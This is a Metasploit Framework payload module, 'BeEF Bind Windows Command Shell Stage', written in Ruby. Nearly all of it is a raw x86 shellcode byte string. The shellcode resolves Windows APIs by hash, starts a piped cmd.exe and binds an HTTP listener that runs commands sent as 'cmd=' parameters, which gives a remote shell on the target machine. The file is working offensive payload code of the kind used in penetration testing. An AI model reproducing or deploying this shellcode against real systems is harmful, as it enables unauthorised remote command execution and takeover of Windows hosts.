##
# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module MetasploitModule
  include Msf::Payload::Windows
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
                     'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
                     'Version' => '$Revision: 11421 $',
                     'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
                     'Author' => ['Ty Miller'],
                     'License' => BSD_LICENSE,
                     'Platform' => 'win',
                     'Arch' => ARCH_X86,
                     'Session' => Msf::Sessions::CommandShellWindows,
                     'PayloadCompat' =>
                        {
                          'Convention' => 'beef_bind'
                        },
                     'Stage' =>
                        {
                          'Offsets' =>
                             {
                               'LPORT' => [511, 'n']
                             },
                          'Payload' =>
                            "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" \
                            "\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" \
                            "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" \
                            "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" \
                            "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" \
                            "\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" \
                            "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" \
                            "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" \
                            "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" \
                            "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" \
                            "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" \
                            "\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" \
                            "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" \
                            "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" \
                            "\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" \
                            "\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" \
                            "\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" \
                            "\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" \
                            "\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" \
                            "\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" \
                            "\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" \
                            "\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" \
                            "\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" \
                            "\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" \
                            "\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" \
                            "\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" \
                            "\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" \
                            "\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" \
                            "\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" \
                            "\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" \
                            "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" \
                            "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" \
                            "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" \
                            "\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" \
                            "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" \
                            "\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" \
                            "\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" \
                            "\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" \
                            "\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" \
                            "\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" \
                            "\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" \
                            "\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" \
                            "\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" \
                            "\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" \
                            "\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" \
                            "\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" \
                            "\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" \
                            "\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" \
                            "\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" \
                            "\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" \
                            "\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" \
                            "\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" \
                            "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" \
                            "\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" \
                            "\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" \
                            "\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" \
                            "\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" \
                            "\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" \
                            "\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" \
                            "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" \
                            "\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" \
                            "\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" \
                            "\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" \
                            "\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" \
                            "\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" \
                            "\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" \
                            "\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" \
                            "\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" \
                            "\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" \
                            "\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" \
                            "\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" \
                            "\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" \
                            "\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" \
                            "\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" \
                            "\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" \
                            "\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" \
                            "\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" \
                            "\xff\xd5\xe9\x58\xfe\xff\xff"
                        }))
  end

  # Stage encoding is safe for this payload
  def encode_stage?
    true
  end
end
